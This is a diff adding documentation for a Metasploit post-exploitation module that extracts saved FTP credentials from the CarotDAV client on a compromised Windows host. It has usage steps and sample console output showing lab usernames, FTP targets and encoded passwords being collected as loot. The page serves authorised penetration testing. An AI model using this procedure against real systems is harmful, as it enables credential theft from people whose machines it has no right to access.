|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This post-exploitation module extracts clear text credentials from the CarotDAV ftp Client. |
| 4 | + |
| 5 | +The CarotDAV FTP Client is avaialble from (https://rei.to/carotdav_en.html). |
| 6 | + |
| 7 | +This module extracts information from the Setting file in the "AppData\Roaming\Rei Software\CarotDAV" directory. |
| 8 | + |
| 9 | +This module extracts server information such as connection name, target URI, username and password. |
| 10 | + |
| 11 | + |
| 12 | +## Verification Steps |
| 13 | + |
| 14 | +1. Start MSF console |
| 15 | +2. Get a Meterpreter session on a Windows system |
| 16 | +3. use post/windows/gather/credentials/carotdav_ftp |
| 17 | +4. Set SESSION 1 |
| 18 | +5. enter 'run' to extract credentials from all applications |
| 19 | + |
| 20 | + |
| 21 | +## Options |
| 22 | +### VERBOSE |
| 23 | + |
| 24 | +By default verbose is turned off. When turned on, the module will show information on files |
| 25 | +which aren't extracted and information that is not directly related to the artifact output. |
| 26 | + |
| 27 | + |
| 28 | +### STORE_LOOT |
| 29 | +This option is turned on by default and saves the stolen artifacts/files on the local machine, |
| 30 | +this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. |
| 31 | + |
| 32 | + |
| 33 | +### EXTRACT_DATA |
| 34 | +This option is turned on by default and will perform the data extraction using the predefined |
| 35 | +regular expression. The 'Store loot' options must be turned on in order for this to take work. |
| 36 | + |
| 37 | +## Scenarios |
| 38 | +### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output |
| 39 | +``` |
| 40 | +msf6 post(windows/gather/credentials/carotdav_ftp) > run |
| 41 | +
|
| 42 | +[*] Filtering based on these selections: |
| 43 | +[*] ARTIFACTS: All |
| 44 | +[*] STORE_LOOT: true |
| 45 | +[*] EXTRACT_DATA: true |
| 46 | +
|
| 47 | +[*] Carotdav's Setting file found |
| 48 | +[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml |
| 49 | +[*] Carotdav Setting.xml downloaded |
| 50 | +[+] File saved to: /home/kali/.msf4/loot/20240508103946_default_10.0.0.2_CarotDAVSetting._341142.xml |
| 51 | +
|
| 52 | +[+] <Name>TheTestBed</Name> |
| 53 | +[+] <Name>Aperture Testing Laboratories</Name> |
| 54 | +[+] <TargetUri>ftp://10.0.0.2/</TargetUri> |
| 55 | +[+] <TargetUri>ftp://10.0.0.3/</TargetUri> |
| 56 | +[+] <UserName>TestBed\TheTester</UserName> |
| 57 | +[+] <UserName>TestBed\TheBackupTester</UserName> |
| 58 | +[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password> |
| 59 | +[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password> |
| 60 | +[+] File with data saved: /home/kali/.msf4/loot/20240508103947_default_10.0.0.2_EXTRACTIONSSetti_673514.xml |
| 61 | +[*] PackRat credential sweep Completed |
| 62 | +[*] Post module execution completed |
| 63 | +
|
| 64 | +``` |
| 65 | + |
| 66 | +### CarotDAV FTP v1.16.3 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output |
| 67 | +``` |
| 68 | +msf6 post(windows/gather/credentials/carotdav_ftp) > run |
| 69 | +
|
| 70 | +[*] Filtering based on these selections: |
| 71 | +[*] ARTIFACTS: All |
| 72 | +[*] STORE_LOOT: true |
| 73 | +[*] EXTRACT_DATA: true |
| 74 | +
|
| 75 | +[*] Starting Packrat... |
| 76 | +[-] Carotdav's base folder not found in users's user directory |
| 77 | +
|
| 78 | +[*] Starting Packrat... |
| 79 | +[*] Carotdav's base folder found |
| 80 | +[*] Found the folder containing specified artifact for Setting. |
| 81 | +[*] Carotdav's Setting file found |
| 82 | +[*] Processing C:\Users\test\AppData\Roaming\Rei Software\CarotDAV |
| 83 | +[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml |
| 84 | +[*] Carotdav Setting.xml downloaded |
| 85 | +[+] File saved to: /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_CarotDAVSetting._292914.xml |
| 86 | +
|
| 87 | +[*] Searches for credentials (USERNAMES/PASSWORDS) |
| 88 | +[+] <Name>TheTestBed</Name> |
| 89 | +[*] Searches for credentials (USERNAMES/PASSWORDS) |
| 90 | +[+] <Name>Aperture Testing Laboratories</Name> |
| 91 | +[*] Searches for credentials (USERNAMES/PASSWORDS) |
| 92 | +[+] <TargetUri>ftp://10.0.0.2/</TargetUri> |
| 93 | +[*] Searches for credentials (USERNAMES/PASSWORDS) |
| 94 | +[+] <TargetUri>ftp://10.0.0.3/</TargetUri> |
| 95 | +[*] Searches for credentials (USERNAMES/PASSWORDS) |
| 96 | +[+] <UserName>TestBed\TheTester</UserName> |
| 97 | +[*] Searches for credentials (USERNAMES/PASSWORDS) |
| 98 | +[+] <UserName>TestBed\TheBackupTester</UserName> |
| 99 | +[*] Searches for credentials (USERNAMES/PASSWORDS) |
| 100 | +[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password> |
| 101 | +[*] Searches for credentials (USERNAMES/PASSWORDS) |
| 102 | +[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password> |
| 103 | +[+] File with data saved: /home/kali/.msf4/loot/20240508103903_default_10.0.0.2_EXTRACTIONSSetti_754664.xml |
| 104 | +[*] PackRat credential sweep Completed |
| 105 | +[*] Post module execution completed |
| 106 | +
|
| 107 | +``` |
0 commit comments